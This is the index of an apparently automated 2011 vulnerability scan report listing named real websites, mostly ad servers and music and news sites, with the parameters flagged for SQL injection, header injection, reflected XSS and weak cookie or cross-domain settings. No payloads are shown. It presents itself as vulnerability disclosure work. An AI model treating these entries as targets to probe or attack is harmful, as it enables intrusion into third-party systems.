XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 05092011-02

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

Report generated by XSS.CX at Mon May 09 09:36:16 CDT 2011.


Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

1. SQL injection

1.1. http://l.alvenda.net/e [e parameter]

1.2. http://l.alvenda.net/e [so parameter]

1.3. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx [REST URL parameter 2]

2. HTTP header injection

2.1. http://ad.doubleclick.net/adi/N3671.burst/B5229711.3 [REST URL parameter 1]

2.2. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [name of an arbitrarily supplied request parameter]

2.3. http://ad.doubleclick.net/pfadx/gannett_brevard_cim/floridatoday [secure parameter]

3. Cross-site scripting (reflected)

3.1. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.2. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 3]

3.3. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [name of an arbitrarily supplied request parameter]

3.4. http://a.collective-media.net/adj/cm.tribune/uscell_ldev_300x600_05311 [tgt parameter]

3.5. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.6. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.7. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [name of an arbitrarily supplied request parameter]

3.8. http://a.collective-media.net/adj/q1.q.gc.6170/be_news [sz parameter]

3.9. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 2]

3.10. http://a.collective-media.net/adj/q1.q.gc.6170/news [REST URL parameter 3]

3.11. http://a.collective-media.net/adj/q1.q.gc.6170/news [name of an arbitrarily supplied request parameter]

3.12. http://a.collective-media.net/adj/q1.q.gc.6170/news [sz parameter]

3.13. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 1]

3.14. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 2]

3.15. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [REST URL parameter 3]

3.16. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [sz parameter]

3.17. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 1]

3.18. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 2]

3.19. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [REST URL parameter 3]

3.20. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [sz parameter]

3.21. http://ad.doubleclick.net/adj/cm.tribune/uscell_ldev_300x600_05311 [net parameter]

3.22. http://ad.doubleclick.net/adj/trb.orlandosentinel/biz [;ptype parameter]

3.23. http://ad.turn.com/server/pixel.htm [fpid parameter]

3.24. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.25. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]

3.26. http://admatch-syndication.mochila.com/viewer/channel/badgex [buyerId parameter]

3.27. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

3.28. http://admeld.adnxs.com/usersync [admeld_callback parameter]

3.29. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

3.30. http://ar.voicefive.com/b/rc.pli [func parameter]

3.31. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.32. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.33. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.34. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.35. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.36. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.37. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.38. http://bid.openx.net/json [c parameter]

3.39. http://choices.truste.com/ca [c parameter]

3.40. http://choices.truste.com/ca [cid parameter]

3.41. http://choices.truste.com/ca [iplc parameter]

3.42. http://choices.truste.com/ca [js parameter]

3.43. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]

3.44. http://choices.truste.com/ca [ox parameter]

3.45. http://choices.truste.com/ca [plc parameter]

3.46. http://choices.truste.com/ca [zi parameter]

3.47. http://content.pulse360.com/cgi-bin/context.cgi [id parameter]

3.48. http://ct.buzzfeed.com/wd/UserWidget [amp;or parameter]

3.49. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

3.50. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json [callback parameter]

3.51. http://edge.viagogo.co.uk/feeds/widget.ashx [PCID parameter]

3.52. http://event.adxpose.com/event.flow [uid parameter]

3.53. http://floridatoday.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.54. http://ib.adnxs.com/ab [cnd parameter]

3.55. http://ib.adnxs.com/ab [custom_macro parameter]

3.56. http://ib.adnxs.com/ptj [redir parameter]

3.57. http://imp.fetchback.com/serve/fb/adtag.js [clicktrack parameter]

3.58. http://imp.fetchback.com/serve/fb/adtag.js [name of an arbitrarily supplied request parameter]

3.59. http://imp.fetchback.com/serve/fb/adtag.js [type parameter]

3.60. http://js.revsci.net/gateway/gw.js [csid parameter]

3.61. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [REST URL parameter 2]

3.62. http://mf.sitescout.com/tag.jsp [h parameter]

3.63. http://mf.sitescout.com/tag.jsp [pid parameter]

3.64. http://mf.sitescout.com/tag.jsp [w parameter]

3.65. http://odb.outbrain.com/utils/odb [callback parameter]

3.66. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81 [callback parameter]

3.67. http://r.turn.com/server/pixel.htm [fpid parameter]

3.68. http://r.turn.com/server/pixel.htm [sp parameter]

3.69. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpcb parameter]

3.70. http://sitelife.floridatoday.com/ver1.0/daapi2.api [jpctx parameter]

3.71. http://static.nme.com/themes/default/static_images//themes/default/images/footer_bkgrd.gif [REST URL parameter 1]

3.72. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

3.73. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

3.74. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

3.75. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

3.76. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

3.77. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

3.78. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

3.79. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

3.80. http://tap-cdn.rubiconproject.com/partner/scripts/rubicon/page_parser.js [d parameter]

3.81. http://wd.sharethis.com/api/getCount2.php [cb parameter]

3.82. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter]

3.83. http://wd.sharethis.com/api/getCount2.php [url parameter]

3.84. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.85. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [evt parameter]

3.86. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.87. http://widgets.surphace.com/partner/omniture/sphereomni_api.php [siteid parameter]

3.88. https://www.ccnow.com/cgi-local/checkout.cgi [shipto parameter]

3.89. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 1]

3.90. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.91. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.92. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [REST URL parameter 2]

3.93. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.94. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown [name of an arbitrarily supplied request parameter]

3.95. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 1]

3.96. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 2]

3.97. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 3]

3.98. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 4]

3.99. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico [REST URL parameter 5]

3.100. http://www.clashmusic.com/user/a [REST URL parameter 1]

3.101. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.102. http://www.clashmusic.com/user/a [REST URL parameter 2]

3.103. http://www.clashmusic.com/user/a [name of an arbitrarily supplied request parameter]

3.104. http://www.clashmusic.com/user/password [REST URL parameter 1]

3.105. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.106. http://www.clashmusic.com/user/password [REST URL parameter 2]

3.107. http://www.clashmusic.com/user/password [name of an arbitrarily supplied request parameter]

3.108. http://www.clashmusic.com/user/register [REST URL parameter 1]

3.109. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.110. http://www.clashmusic.com/user/register [REST URL parameter 2]

3.111. http://www.clashmusic.com/user/register [name of an arbitrarily supplied request parameter]

3.112. http://www.irishtimes.com/newspaper/mostread/pagelog.cfm [REST URL parameter 3]

3.113. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 2]

3.114. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 4]

3.115. http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html [REST URL parameter 5]

3.116. http://www.nme.com/adcode/hot-spot.html [REST URL parameter 1]

3.117. http://www.nme.com/favicon.ico [REST URL parameter 1]

3.118. http://www.nme.com/hotspot/channel/news [REST URL parameter 1]

3.119. http://www.nme.com/news/sufjan-stevens/56527 [REST URL parameter 1]

3.120. http://ib.adnxs.com/ttj [Referer HTTP header]

3.121. http://a.collective-media.net/cmadj/q1.q.gc.6170/be_news [cli cookie]

3.122. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.123. http://a.collective-media.net/cmadj/q1.q.gc.6170/news [cli cookie]

3.124. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

3.129. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

3.130. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

3.131. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

3.132. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

3.133. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

3.134. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

3.135. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.136. http://k.collective-media.net/cmadj/cm.tribune/uscell_ldev_300x600_05311 [cli cookie]

3.137. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js [ruid cookie]

3.138. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js [ruid cookie]

3.139. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js [ruid cookie]

3.140. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js [ruid cookie]

3.141. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js [ruid cookie]

3.142. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js [ruid cookie]

3.143. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js [ruid cookie]

3.144. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js [ruid cookie]

3.145. http://seg.sharethis.com/getSegment.php [__stid cookie]

3.146. http://tag.contextweb.com/TagPublish/getad.aspx [V cookie]

3.147. http://tag.contextweb.com/TagPublish/getad.aspx [cwbh1 cookie]

4. Flash cross-domain policy

4.1. http://ad-apac.doubleclick.net/crossdomain.xml

4.2. http://ad.au.doubleclick.net/crossdomain.xml

4.3. http://adserver.adtech.de/crossdomain.xml

4.4. http://adserverams.adtech.de/crossdomain.xml

4.5. http://alvenda.122.2o7.net/crossdomain.xml

4.6. http://api.brightcove.com/crossdomain.xml

4.7. http://cspix.media6degrees.com/crossdomain.xml

4.8. http://f2nthevine.112.2o7.net/crossdomain.xml

4.9. http://ie-stat.bmmetrix.com/crossdomain.xml

4.10. http://imp.fetchback.com/crossdomain.xml

4.11. http://in.getclicky.com/crossdomain.xml

4.12. http://ipcmedia.122.2o7.net/crossdomain.xml

4.13. http://irishtimesgroup.112.2o7.net/crossdomain.xml

4.14. http://p.addthis.com/crossdomain.xml

4.15. http://pixel.33across.com/crossdomain.xml

4.16. http://s0.2mdn.net/crossdomain.xml

4.17. http://secure-au.imrworldwide.com/crossdomain.xml

4.18. http://va.px.invitemedia.com/crossdomain.xml

4.19. http://edge.viagogo.co.uk/crossdomain.xml

4.20. http://l.alvenda.net/crossdomain.xml

4.21. http://optimized-by.rubiconproject.com/crossdomain.xml

4.22. http://static.nme.com/crossdomain.xml

4.23. http://west.thomson.com/crossdomain.xml

5. Silverlight cross-domain policy

5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml

5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml

5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml

5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml

5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml

5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml

5.7. http://pixel.33across.com/clientaccesspolicy.xml

5.8. http://s0.2mdn.net/clientaccesspolicy.xml

5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml

6. Cleartext submission of password

6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

6.2. http://www.clashmusic.com/user/a

6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

7. Session token in URL

7.1. http://api.brightcove.com/services/library

7.2. http://l.sharethis.com/pview

7.3. http://www.apture.com/js/apture.js

7.4. http://www.facebook.com/extern/login_status.php

7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html

7.6. http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story

7.7. http://www.orlandosentinel.com/business/transparent

8. Password field submitted using GET method

8.1. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

8.2. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

9. Cookie scoped to parent domain

9.1. http://api.twitter.com/1/statuses/user_timeline.json

9.2. http://t.mookie1.com/t/v1/imp

9.3. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

9.4. http://www.nme.com/news/sufjan-stevens/56527

9.5. http://ad.afy11.net/ad

9.6. http://ad.turn.com/server/pixel.htm

9.7. http://admeld.adnxs.com/usersync

9.8. http://ads.adbrite.com/adserver/vdi/742697

9.9. http://ads.pointroll.com/PortalServe/

9.10. http://ads.revsci.net/adserver/ako

9.11. http://ads.revsci.net/adserver/ako

9.12. http://ads.revsci.net/adserver/ako

9.13. http://ads.revsci.net/adserver/ako

9.14. http://ads.revsci.net/adserver/ako

9.15. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

9.16. http://adserver.adtech.de/bind

9.17. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

9.18. http://ar.voicefive.com/b/wc_beacon.pli

9.19. http://ar.voicefive.com/bmx3/broker.pli

9.20. http://b.scorecardresearch.com/b

9.21. http://b.scorecardresearch.com/r

9.22. http://b.voicefive.com/b

9.23. http://bh.contextweb.com/bh/rtset

9.24. http://bid.openx.net/json

9.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.26. http://cf.addthis.com/red/p.json

9.27. http://content.pulse360.com/cgi-bin/context.cgi

9.28. http://core.insightexpressai.com/adServer/adServerESI.aspx

9.29. http://cspix.media6degrees.com/orbserv/hbpix

9.30. http://cw-m.d.chango.com/m/cw

9.31. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

9.32. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

9.33. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

9.34. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

9.35. http://data.adsrvr.org/map/cookie/contextweb

9.36. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

9.37. http://edge.quantserve.com/quant.js

9.38. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

9.39. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

9.40. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

9.41. http://i.w55c.net/ping_match.gif

9.42. http://ib.adnxs.com/ab

9.43. http://ib.adnxs.com/getuid

9.44. http://ib.adnxs.com/if

9.45. http://ib.adnxs.com/mapuid

9.46. http://ib.adnxs.com/ptj

9.47. http://ib.adnxs.com/seg

9.48. http://ib.adnxs.com/ttj

9.49. http://idpix.media6degrees.com/orbserv/hbpix

9.50. http://image2.pubmatic.com/AdServer/Pug

9.51. http://imp.fetchback.com/serve/fb/adtag.js

9.52. http://imp.fetchback.com/serve/fb/imp

9.53. http://ipcmedia.grapeshot.co.uk/channels.cgi

9.54. http://js.revsci.net/gateway/gw.js

9.55. http://leadback.advertising.com/adcedge/lb

9.56. http://newspaper.app40.ur.gcion.com/GCION.ashx

9.57. http://odb.outbrain.com/utils/odb

9.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

9.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

9.60. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

9.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

9.62. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

9.63. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

9.64. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

9.65. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

9.66. http://p.brilig.com/contact/bct

9.67. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

9.68. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.69. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

9.70. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

9.71. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

9.72. http://pixel.33across.com/ps/

9.73. http://pixel.invitemedia.com/data_sync

9.74. http://pixel.quantserve.com/pixel

9.75. http://pixel.rubiconproject.com/tap.php

9.76. http://r.openx.net/set

9.77. http://r.turn.com/r/bd

9.78. http://r.turn.com/server/pixel.htm

9.79. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

9.80. http://rt.legolas-media.com/lgrt

9.81. http://services.krxd.net/pixel.gif

9.82. http://sitelife.floridatoday.com/ver1.0/daapi2.api

9.83. http://sync.mathtag.com/sync/img

9.84. http://syndication.mmismm.com/tntwo.php

9.85. http://t.invitemedia.com/track_imp

9.86. http://tacoda.at.atwola.com/rtx/r.js

9.87. http://tag.contextweb.com/TagPublish/getad.aspx

9.88. http://tags.bluekai.com/site/2731

9.89. http://tags.bluekai.com/site/3358

9.90. http://tap.rubiconproject.com/oz/sensor

9.91. http://trgca.opt.fimserve.com/fp.gif

9.92. http://va.px.invitemedia.com/pixel

9.93. http://www.burstnet.com/enlightn/7578//12A4/

10. Cookie without HttpOnly flag set

10.1. http://admatch-syndication.mochila.com/viewer/channel/badgeCSS

10.2. http://admatch-syndication.mochila.com/viewer/channel/badgex

10.3. http://ads.adxpose.com/ads/ads.js

10.4. http://event.adxpose.com/event.flow

10.5. http://s.clickability.com/s

10.6. http://t.mookie1.com/t/v1/imp

10.7. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

10.8. http://www.nme.com/news/sufjan-stevens/56527

10.9. http://ad.afy11.net/ad

10.10. http://ad.turn.com/server/pixel.htm

10.11. http://ad.yieldmanager.com/iframe3

10.12. http://ad.yieldmanager.com/imp

10.13. http://ad.yieldmanager.com/pixel

10.14. http://ad.yieldmanager.com/unpixel

10.15. http://ads.adbrite.com/adserver/vdi/742697

10.16. http://ads.pointroll.com/PortalServe/

10.17. http://ads.revsci.net/adserver/ako

10.18. http://ads.revsci.net/adserver/ako

10.19. http://ads.revsci.net/adserver/ako

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951880%7C0%7C170%7CADTECH

10.23. http://adserver.adtech.de/addyn%7C3.0%7C577%7C2951881%7C0%7C1%7CADTECH

10.24. http://adserver.adtech.de/bind

10.25. http://adserver.clashmusic.com/www/delivery/lg.php

10.26. http://adserver.clashmusic.com/www/delivery/spc.php

10.27. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

10.28. http://api.twitter.com/1/statuses/user_timeline.json

10.29. http://api.twitter.com/1/statuses/user_timeline.json

10.30. http://ar.atwola.com/atd

10.31. http://ar.voicefive.com/b/wc_beacon.pli

10.32. http://ar.voicefive.com/bmx3/broker.pli

10.33. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

10.34. http://b.scorecardresearch.com/b

10.35. http://b.scorecardresearch.com/r

10.36. http://b.voicefive.com/b

10.37. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

10.38. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

10.39. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=short/bgcol=FFFFFF/linkcol=4285BB/

10.40. http://bh.contextweb.com/bh/rtset

10.41. http://bid.openx.net/json

10.42. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.43. http://cf.addthis.com/red/p.json

10.44. http://content.pulse360.com/cgi-bin/context.cgi

10.45. http://contextweb-match.dotomi.com/

10.46. http://core.insightexpressai.com/adServer/adServerESI.aspx

10.47. http://cspix.media6degrees.com/orbserv/hbpix

10.48. http://cw-m.d.chango.com/m/cw

10.49. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2931142961646634775

10.50. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/2931142961646634775

10.51. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/2931142961646634775

10.52. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2931142961646634775

10.53. http://d.tradex.openx.com/ajs.php

10.54. http://d.tradex.openx.com/lg.php

10.55. http://data.adsrvr.org/map/cookie/contextweb

10.56. http://data.cmcore.com/imp

10.57. http://ds.addthis.com/red/psi/sites/www.irishtimes.com/p.json

10.58. http://edge.quantserve.com/quant.js

10.59. http://f2nthevine.112.2o7.net/b/ss/f2nthevine/1/H.11-pdv-2/s88536230181343

10.60. http://floridatoday.us.intellitxt.com/intellitxt/front.asp

10.61. http://gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH

10.62. http://gannett.gcion.com/addyn/3.0/5111.1/896067/0/-1/ADTECH

10.63. http://gpaper114.112.2o7.net/b/ss/gpaper114,gntbcstglobal/1/H.21/s81096398781519

10.64. http://i.w55c.net/ping_match.gif

10.65. http://idpix.media6degrees.com/orbserv/hbpix

10.66. http://ie-stat.bmmetrix.com/V13a

10.67. http://ie-stat.bmmetrix.com/V13b

10.68. http://image2.pubmatic.com/AdServer/Pug

10.69. http://imp.fetchback.com/serve/fb/adtag.js

10.70. http://imp.fetchback.com/serve/fb/imp

10.71. http://ipcmedia.122.2o7.net/b/ss/nmeprod,ipcauditglobalprod/1/H.22.1/s89725573572795

10.72. http://ipcmedia.grapeshot.co.uk/channels.cgi

10.73. http://irishtimesgroup.112.2o7.net/b/ss/itgirishtimesprod/1/H.15.1/s81982920831069

10.74. http://js.revsci.net/gateway/gw.js

10.75. http://latent.alvenda.net/Latent.html

10.76. http://leadback.advertising.com/adcedge/lb

10.77. http://media.adfrontiers.com/pq

10.78. http://newspaper.app40.ur.gcion.com/GCION.ashx

10.79. http://oads.mochila.com/openx/www/delivery/ajs.php

10.80. http://oads.mochila.com/www/delivery/lg.php

10.81. http://odb.outbrain.com/utils/odb

10.82. http://openx2-match.dotomi.com/

10.83. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

10.84. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

10.85. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

10.86. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

10.87. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js

10.88. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js

10.89. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js

10.90. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js

10.91. http://p.brilig.com/contact/bct

10.92. http://pix04.revsci.net/B08725/b3/0/3/1008211/17329585.js

10.93. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.94. http://pix04.revsci.net/I10982/b3/0/3/1003161/448768738.js

10.95. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

10.96. http://pix04.revsci.net/J06575/b3/0/3/1003161/306691632.gif

10.97. http://pixel.33across.com/ps/

10.98. http://pixel.invitemedia.com/data_sync

10.99. http://pixel.quantserve.com/pixel

10.100. http://pixel.rubiconproject.com/tap.php

10.101. http://r.openx.net/set

10.102. http://r.turn.com/r/bd

10.103. http://r.turn.com/server/pixel.htm

10.104. http://r1-ads.ace.advertising.com/site=743832/size=728090/u=2/bnum=29047542/hr=9/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.floridatoday.com%252Farticle%252F20110508%252FNEWS01%252F105080319%252FHighly-publicized-murder-Caylee-Anthony-rivets-enrages

10.105. http://rt.legolas-media.com/lgrt

10.106. http://services.krxd.net/pixel.gif

10.107. http://sitelife.floridatoday.com/ver1.0/Content/images/store/12/1/6c2f9a14-d970-4d97-b1b8-998eda420787.Large.jpg

10.108. http://sitelife.floridatoday.com/ver1.0/Content/images/store/13/14/3d0cb25d-d19d-4993-ae7a-7bb7b30af008.Large.jpg

10.109. http://sitelife.floridatoday.com/ver1.0/Direct/DirectProxy

10.110. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/json-min.js

10.111. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/pork.iframe.js

10.112. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requestbatch.js

10.113. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/requesttypes.js

10.114. http://sitelife.floridatoday.com/ver1.0/content/direct/scripts/yahoo-min.js

10.115. http://sitelife.floridatoday.com/ver1.0/daapi2.api

10.116. http://sitelife.floridatoday.com/ver1.0/direct/javascriptsdkproxy

10.117. http://sync.mathtag.com/sync/img

10.118. http://syndication.mmismm.com/tntwo.php

10.119. http://t.invitemedia.com/track_imp

10.120. http://tacoda.at.atwola.com/rtx/r.js

10.121. http://tag.contextweb.com/TagPublish/getad.aspx

10.122. http://tags.bluekai.com/site/2731

10.123. http://tags.bluekai.com/site/3358

10.124. http://tap.rubiconproject.com/oz/sensor

10.125. http://trgca.opt.fimserve.com/fp.gif

10.126. http://va.px.invitemedia.com/pixel

10.127. http://west.thomson.com/VendorFeeds/Alvendify/AlvendaImpression.aspx

10.128. http://www.burstbeacon.com/view/103170/64948/182030/318088/3050/2D1A28EF/

10.129. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

10.130. http://www.burstnet.com/enlightn/7578//12A4/

10.131. http://www.ccnow.com/cgi-local/cart.cgi

10.132. http://www.ccnow.com/cgi-local/sc_cart.cgi

10.133. https://www.ccnow.com/cgi-local/cart.cgi

10.134. https://www.ccnow.com/cgi-local/checkout.cgi

10.135. https://www.ccnow.com/cgi-local/sc_cart.cgi

11. Password field with autocomplete enabled

11.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown

11.2. http://www.clashmusic.com/user/a

11.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html

11.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html

11.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

12. Referer-dependent response

